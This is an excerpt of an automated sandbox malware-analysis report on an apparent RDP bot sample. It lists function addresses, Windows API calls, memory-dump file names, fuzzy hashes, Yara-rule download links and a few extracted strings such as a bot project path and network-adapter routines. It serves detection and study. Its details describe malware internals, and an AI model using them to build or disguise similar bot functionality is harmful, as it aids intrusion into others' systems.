Instruction ID: 91f878f9043d06ed9e3ce852b52380d2870e9c5b27c78a9bf4f2b6e68adbc613
Opcode Fuzzy Hash: 0ea0f9f3e0855ebec4d02b887b4cf1966552980e8b767d39c0e2875b2443d339
Instruction Fuzzy Hash: 40F0626260874652E5529F88B8803797354EF40795F480336EE5D8AAA0DF2DE9C99780

Function 00007FFE11509B0A Relevance: 3.8, APIs: 3, Instructions: 74sleepCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FFE11509BEB
Sleep.KERNEL32 ref: 00007FFE11509BF7

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: Sleepmemcpy
String ID:
API String ID: 1125407320-0
Opcode ID: 53d82a57b16911a5b1527cb144a80cb920e2af3c5daf851a095dbd904dc25674
Instruction ID: 76e48ea39838b76616ca1c5565200e8488794caa168b7993921f1bfdd7fb0a09
Opcode Fuzzy Hash: 53d82a57b16911a5b1527cb144a80cb920e2af3c5daf851a095dbd904dc25674
Instruction Fuzzy Hash: 9C314160E0DF0382F7705BA7D89427C226AAF81770F9003B9D47D466F6EF2DE8419201

Function 00007FFE0EB4EF2A Relevance: 3.8, APIs: 3, Instructions: 74sleepCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FFE0EB4F00B
Sleep.KERNEL32 ref: 00007FFE0EB4F017

Memory Dump Source

Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd

Similarity

API ID: Sleepmemcpy
String ID:
API String ID: 1125407320-0
Opcode ID: 0cb8941dfc163a413c5ab916b78a3d17a0994cdb19c6253a22ed711d911a51f6
Instruction ID: 5cbd6e0f43837169666d4f5b09b899f6a8e5a4a6c1d290eb45965486bb63f2d6
Opcode Fuzzy Hash: 0cb8941dfc163a413c5ab916b78a3d17a0994cdb19c6253a22ed711d911a51f6
Instruction Fuzzy Hash: 7331D9A2E2970382F6306F68A8843792251FF84775F640331E4FD4A6F5DE2DE9459E81

Function 00007FFE0EBD184A Relevance: 3.8, APIs: 3, Instructions: 74sleepCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FFE0EBD192B
Sleep.KERNEL32 ref: 00007FFE0EBD1937

Memory Dump Source

Source File: 00000014.00000002.2559714739.00007FFE0EBD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE0EBD0000, based on PE: true

Associated: 00000014.00000002.2559699117.00007FFE0EBD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559733043.00007FFE0EBE3000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559748990.00007FFE0EBEC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559764197.00007FFE0EBEF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559777530.00007FFE0EBF0000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0ebd0000_main.jbxd

Similarity

API ID: Sleepmemcpy
String ID:
API String ID: 1125407320-0
Opcode ID: a353561d76903494636ec477018f7265d0b2c6ffd32db1de9122ce1526666027
Instruction ID: c033721de812d5e5a5c02b5a72d2c37f3e419fa2cd162b600545b5ee6b515677
Opcode Fuzzy Hash: a353561d76903494636ec477018f7265d0b2c6ffd32db1de9122ce1526666027
Instruction Fuzzy Hash: 77312A20F0D60782F635DF68E8842B82255AF44370F2003B5E5FD467FAEE2DE9959E90

Function 00007FFE0EC0364A Relevance: 3.8, APIs: 3, Instructions: 74sleepCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FFE0EC0372B
Sleep.KERNEL32 ref: 00007FFE0EC03737

Memory Dump Source

Source File: 00000014.00000002.2559811045.00007FFE0EC01000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE0EC00000, based on PE: true

Associated: 00000014.00000002.2559796463.00007FFE0EC00000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559830630.00007FFE0EC12000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559846613.00007FFE0EC1B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559867290.00007FFE0EC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559886112.00007FFE0EC1F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559905319.00007FFE0EC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0ec00000_main.jbxd

Similarity

API ID: Sleepmemcpy
String ID:
API String ID: 1125407320-0
Opcode ID: 992cbff283cf5bc95ae1a3ea0b4319c7fbf54e715062f432e6d1e15d965cf2f6
Instruction ID: 73b34838b55f8c872939271a168244a93b01931b97a2c116399ccd532d40d3cc
Opcode Fuzzy Hash: 992cbff283cf5bc95ae1a3ea0b4319c7fbf54e715062f432e6d1e15d965cf2f6
Instruction Fuzzy Hash: E9311A60E0D6C2A2F7209BA8E8C42782251AF46770F54037AD9FE467F2CE2EE6455652

Function 00007FFE0E16184A Relevance: 3.8, APIs: 3, Instructions: 74sleepCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FFE0E16192B
Sleep.KERNEL32 ref: 00007FFE0E161937

Memory Dump Source

Source File: 00000014.00000002.2559487244.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000014.00000002.2559462531.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559554043.00007FFE0E17D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559569577.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559586296.00007FFE0E181000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0e160000_main.jbxd

Similarity

API ID: Sleepmemcpy
String ID:
API String ID: 1125407320-0
Opcode ID: 3d3b53d04c772b8df934e6e75b7e7394d6e1c1ef4915e661cc7242475e802ccf
Instruction ID: c647a3e78296f41c0fa26a15a73ab8ee7f1f1b9dfdee4252dca916f587bc6732
Opcode Fuzzy Hash: 3d3b53d04c772b8df934e6e75b7e7394d6e1c1ef4915e661cc7242475e802ccf
Instruction Fuzzy Hash: E3310C21F0D603A2F6705B65E88427C2265AF44770F600377D8FE466F7DE2CEA85A781

Function 00007FF6BFD6886D Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6BFD61360: GetModuleHandleExA.KERNEL32(?,?,?,?,?,?,00007FF6BFD684AF), ref: 00007FF6BFD6137E

SleepEx.KERNEL32 ref: 00007FF6BFD688DC

Memory Dump Source

Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true

Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd

Similarity

API ID: HandleModuleSleep
String ID:
API String ID: 1071907932-0
Opcode ID: ebcfc3099e72364c31fa6fcd18c915c859bbb365beea9433ade7ab1f37a8b2e3
Instruction ID: 0b68ba0052ac6b6b448d26eb1550a5b3514e18a7834c131c8b0ac4a950caaf2a
Opcode Fuzzy Hash: ebcfc3099e72364c31fa6fcd18c915c859bbb365beea9433ade7ab1f37a8b2e3
Instruction Fuzzy Hash: 74018122B1C643A2F7A05798F4503BA3391AF84384F540230F70ECB6A5DE6CD945C3C0

Function 00007FF6BFD629FE Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF6BFD62715
_errno.MSVCRT ref: 00007FF6BFD627B7
_errno.MSVCRT ref: 00007FF6BFD627D2
_errno.MSVCRT ref: 00007FF6BFD6294C
_errno.MSVCRT ref: 00007FF6BFD62967
fread.MSVCRT ref: 00007FF6BFD629EA
GetProcessHeap.KERNEL32 ref: 00007FF6BFD62A1F
HeapFree.KERNEL32 ref: 00007FF6BFD62A32

Memory Dump Source

Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true

Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd

Similarity

API ID: _errno$Heap$FreeProcessfclosefread
String ID:
API String ID: 4240746492-0
Opcode ID: eca8601a8072f10b742a6ea828dc9ef14cccec53e02c73ff1a62bffbaf347bab
Instruction ID: e59c78108aa8da474fe7bd0af7132ba0c243d019dffb295b70a7391ee1beb2d7
Opcode Fuzzy Hash: eca8601a8072f10b742a6ea828dc9ef14cccec53e02c73ff1a62bffbaf347bab
Instruction Fuzzy Hash: ADE0DF01B6828321FF7009ED184073627812F9838AF161631EF0EE6AFADD3EE4010880

Function 00007FF6BFD62997 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF6BFD62715
_errno.MSVCRT ref: 00007FF6BFD627B7
_errno.MSVCRT ref: 00007FF6BFD627D2
_errno.MSVCRT ref: 00007FF6BFD6294C
_errno.MSVCRT ref: 00007FF6BFD62967
fread.MSVCRT ref: 00007FF6BFD629EA
GetProcessHeap.KERNEL32 ref: 00007FF6BFD62A1F
HeapFree.KERNEL32 ref: 00007FF6BFD62A32

Memory Dump Source

Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true

Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd

Similarity

API ID: _errno$Heap$FreeProcessfclosefread
String ID:
API String ID: 4240746492-0
Opcode ID: 5eb821edd3b4ac3d11fb5a8a8cf5f479bd344658574371c11ea2e3b3b9955ca5
Instruction ID: 8a897c47da5901dfd984cadcbd4fdd69add7944035ecec35440c024eeb5671a7
Opcode Fuzzy Hash: 5eb821edd3b4ac3d11fb5a8a8cf5f479bd344658574371c11ea2e3b3b9955ca5
Instruction Fuzzy Hash: 77E0DF01B6829321FF7009ED044073627812F9838AF161630EF0EE6AFADD3EF4010880

Function 00007FF6BFD6299E Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF6BFD62715
_errno.MSVCRT ref: 00007FF6BFD627B7
_errno.MSVCRT ref: 00007FF6BFD627D2
_errno.MSVCRT ref: 00007FF6BFD6294C
_errno.MSVCRT ref: 00007FF6BFD62967
fread.MSVCRT ref: 00007FF6BFD629EA
GetProcessHeap.KERNEL32 ref: 00007FF6BFD62A1F
HeapFree.KERNEL32 ref: 00007FF6BFD62A32

Memory Dump Source

Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true

Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd

Similarity

API ID: _errno$Heap$FreeProcessfclosefread
String ID:
API String ID: 4240746492-0
Opcode ID: 06b5753a0f2153fadecf8515356ede5123c149dc1559c95b793d2786b5db2776
Instruction ID: ceb159f19a49f0fe612e6acc69c12bff2e7198a18634cc22e4c84c0c14e43d55
Opcode Fuzzy Hash: 06b5753a0f2153fadecf8515356ede5123c149dc1559c95b793d2786b5db2776
Instruction Fuzzy Hash: C9E0DF01B6829322FF7009ED044073627812F9838AF161631EF0EE6EFADD3EE4010880

Function 00007FF6BFD62982 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF6BFD62715
_errno.MSVCRT ref: 00007FF6BFD627B7
_errno.MSVCRT ref: 00007FF6BFD627D2
_errno.MSVCRT ref: 00007FF6BFD6294C
_errno.MSVCRT ref: 00007FF6BFD62967
fread.MSVCRT ref: 00007FF6BFD629EA
GetProcessHeap.KERNEL32 ref: 00007FF6BFD62A1F
HeapFree.KERNEL32 ref: 00007FF6BFD62A32

Memory Dump Source

Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true

Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd

Similarity

API ID: _errno$Heap$FreeProcessfclosefread
String ID:
API String ID: 4240746492-0
Opcode ID: d9839dda6aa00f83f1b280c0522c91c52a71f8d5d8a1992868c318b81a1566b1
Instruction ID: 00a20c9e42362da19e4bd743fc4003566bef3ea1d44c65fb7ae8434415d9f6d0
Opcode Fuzzy Hash: d9839dda6aa00f83f1b280c0522c91c52a71f8d5d8a1992868c318b81a1566b1
Instruction Fuzzy Hash: BBE0DF01B6829321FF7009ED044073627813F9838AF161630EF0EE6AFADD3EE0010880

Function 00007FF6BFD62989 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF6BFD62715
_errno.MSVCRT ref: 00007FF6BFD627B7
_errno.MSVCRT ref: 00007FF6BFD627D2
_errno.MSVCRT ref: 00007FF6BFD6294C
_errno.MSVCRT ref: 00007FF6BFD62967
fread.MSVCRT ref: 00007FF6BFD629EA
GetProcessHeap.KERNEL32 ref: 00007FF6BFD62A1F
HeapFree.KERNEL32 ref: 00007FF6BFD62A32

Memory Dump Source

Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true

Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd

Similarity

API ID: _errno$Heap$FreeProcessfclosefread
String ID:
API String ID: 4240746492-0
Opcode ID: 0f4c820b4593ff6fa6eb4d1d7b985b18c40b22b35b228e74236585271f35355d
Instruction ID: d7a4497e60c2b967a82263788b8c3c30564b1f9398e0bc18e4602e43ac80f4cd
Opcode Fuzzy Hash: 0f4c820b4593ff6fa6eb4d1d7b985b18c40b22b35b228e74236585271f35355d
Instruction Fuzzy Hash: 72E0DF01B6829321FF7009ED044073627812F9838BF161630EF0EE6AFADD3EE4010880

Function 00007FF6BFD62990 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF6BFD62715
_errno.MSVCRT ref: 00007FF6BFD627B7
_errno.MSVCRT ref: 00007FF6BFD627D2
_errno.MSVCRT ref: 00007FF6BFD6294C
_errno.MSVCRT ref: 00007FF6BFD62967
fread.MSVCRT ref: 00007FF6BFD629EA
GetProcessHeap.KERNEL32 ref: 00007FF6BFD62A1F
HeapFree.KERNEL32 ref: 00007FF6BFD62A32

Memory Dump Source

Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true

Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd

Similarity

API ID: _errno$Heap$FreeProcessfclosefread
String ID:
API String ID: 4240746492-0
Opcode ID: 93779f5a2cdb3e04165489ec7973de93b07f8438cdc681d7751f1fbd96d9f5de
Instruction ID: 3ff456d9810cdde9cecd787442d0ecf982112d8cff92938781857ce00761417d
Opcode Fuzzy Hash: 93779f5a2cdb3e04165489ec7973de93b07f8438cdc681d7751f1fbd96d9f5de
Instruction Fuzzy Hash: 2AE0DF01B6829321FF7009ED044073627812F9838AF161630EF0EE6AFADD3EE4010880

Function 00007FF6BFD681E0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

SetServiceStatus.SECHOST ref: 00007FF6BFD68205

Memory Dump Source

Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true

Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd

Similarity

API ID: ServiceStatus
String ID:
API String ID: 3969395364-0
Opcode ID: 4993fdc76b1177e06be1b464f55a433b82611d2e99cbe8385cbffbaa458d3ac6
Instruction ID: dace35e993a0230da1059648b873a9d4c3f70edca3cde9fb8b2dbf9fd9a96e11
Opcode Fuzzy Hash: 4993fdc76b1177e06be1b464f55a433b82611d2e99cbe8385cbffbaa458d3ac6
Instruction Fuzzy Hash: E4D09E74D1DA02E5E7049F8DFC452243760FF59345F909235E30CD6230EE3C6155A780

Function 00007FF6BFD676D2 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

rand_s.MSVCRT ref: 00007FF6BFD676E3

Memory Dump Source

Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true

Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd

Similarity

API ID: rand_s
String ID:
API String ID: 863162693-0
Opcode ID: 34b79ae6e1dd47e5b081b7fbe00c12fbd074ba990cf07bcb48e6a06ddf1fcfa5
Instruction ID: eeffb8eb1e5502ebb128ea1b2162dff36881ae9c8a9ada85be0964e790a9c0d2
Opcode Fuzzy Hash: 34b79ae6e1dd47e5b081b7fbe00c12fbd074ba990cf07bcb48e6a06ddf1fcfa5
Instruction Fuzzy Hash: 52C04C76A18540DAD730DB24E8453597770F798308FD04211E65D826A4DF3CD61FCF44

Function 00007FFE0E165A47 Relevance: 1.3, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FFE0E165A55

Memory Dump Source

Source File: 00000014.00000002.2559487244.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000014.00000002.2559462531.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559554043.00007FFE0E17D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559569577.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559586296.00007FFE0E181000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0e160000_main.jbxd

Similarity

API ID: CriticalEnterSection
String ID:
API String ID: 1904992153-0
Opcode ID: 7abd05a5a67c31e03c5b12fe05f629d692a795e69a910426a5662404033e003a
Instruction ID: 577923021f62a84cc450fc2b12bcfc820c37eea88e8fe73bf3fe5af8c4d76798
Opcode Fuzzy Hash: 7abd05a5a67c31e03c5b12fe05f629d692a795e69a910426a5662404033e003a
Instruction Fuzzy Hash: 55C08C50F1910AC2FB08A771B98103812206F9C700F001036C8EE42372CE1C98D94200

Non-executed Functions

Function 00007FFE11502278 Relevance: 31.6, APIs: 8, Strings: 10, Instructions: 129memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FFE115022C8
HeapAlloc.KERNEL32 ref: 00007FFE115022DC
GetAdaptersInfo.IPHLPAPI ref: 00007FFE115022F6
GetProcessHeap.KERNEL32 ref: 00007FFE1150230D
HeapFree.KERNEL32 ref: 00007FFE1150231E
GetProcessHeap.KERNEL32 ref: 00007FFE11502328
HeapAlloc.KERNEL32 ref: 00007FFE11502339
GetAdaptersInfo.IPHLPAPI ref: 00007FFE11502353

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE1150239C, 00007FFE115023CC
net_info, xrefs: 00007FFE11502365, 00007FFE11502395, 00007FFE115023C5, 00007FFE115023E2, 00007FFE11502446, 00007FFE11502485
[E] (%s) -> GetBestInterface failed(res=%08lx), xrefs: 00007FFE115023E9
(pref_adapter_type != NULL), xrefs: 00007FFE115023BE
H:/Projects/rdp/bot/codebase/net.c, xrefs: 00007FFE11502387, 00007FFE115023B7
mem_alloc, xrefs: 00007FFE1150240A, 00007FFE11502429
[E] (%s) -> GetAdaptersInfo failed(res=%08lx), xrefs: 00007FFE1150236C, 00007FFE1150244D
[D] (%s) -> Adapter detected(name=%s,desc=%s,type=%d), xrefs: 00007FFE1150248C
(adapter_num != NULL), xrefs: 00007FFE1150238E
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE11502411, 00007FFE11502430

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: Heap$Process$AdaptersAllocInfo$Free
String ID: (adapter_num != NULL)$(pref_adapter_type != NULL)$H:/Projects/rdp/bot/codebase/net.c$[D] (%s) -> Adapter detected(name=%s,desc=%s,type=%d)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> GetAdaptersInfo failed(res=%08lx)$[E] (%s) -> GetBestInterface failed(res=%08lx)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$net_info
API String ID: 2437369060-1325175688
Opcode ID: c4b389ba31edfb4235e2faf3d76b78466cef202fedc40949f5a608255a9b2779
Instruction ID: 493469b58c19a282c6e81dbcaaf53cc88b58bf77165f136a0dd27448c7a42a42
Opcode Fuzzy Hash: c4b389ba31edfb4235e2faf3d76b78466cef202fedc40949f5a608255a9b2779
Instruction Fuzzy Hash: 25519E61A0CE8795FB519B97E8402FC3BA9EF407A4F4490B9DD4E4A2B5EF2CE509C701

Function 00007FFE13301D98 Relevance: 31.6, APIs: 8, Strings: 10, Instructions: 129memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FFE13301DE8
HeapAlloc.KERNEL32 ref: 00007FFE13301DFC
GetAdaptersInfo.IPHLPAPI ref: 00007FFE13301E16
GetProcessHeap.KERNEL32 ref: 00007FFE13301E2D
HeapFree.KERNEL32 ref: 00007FFE13301E3E
GetProcessHeap.KERNEL32 ref: 00007FFE13301E48
HeapAlloc.KERNEL32 ref: 00007FFE13301E59
GetAdaptersInfo.IPHLPAPI ref: 00007FFE13301E73

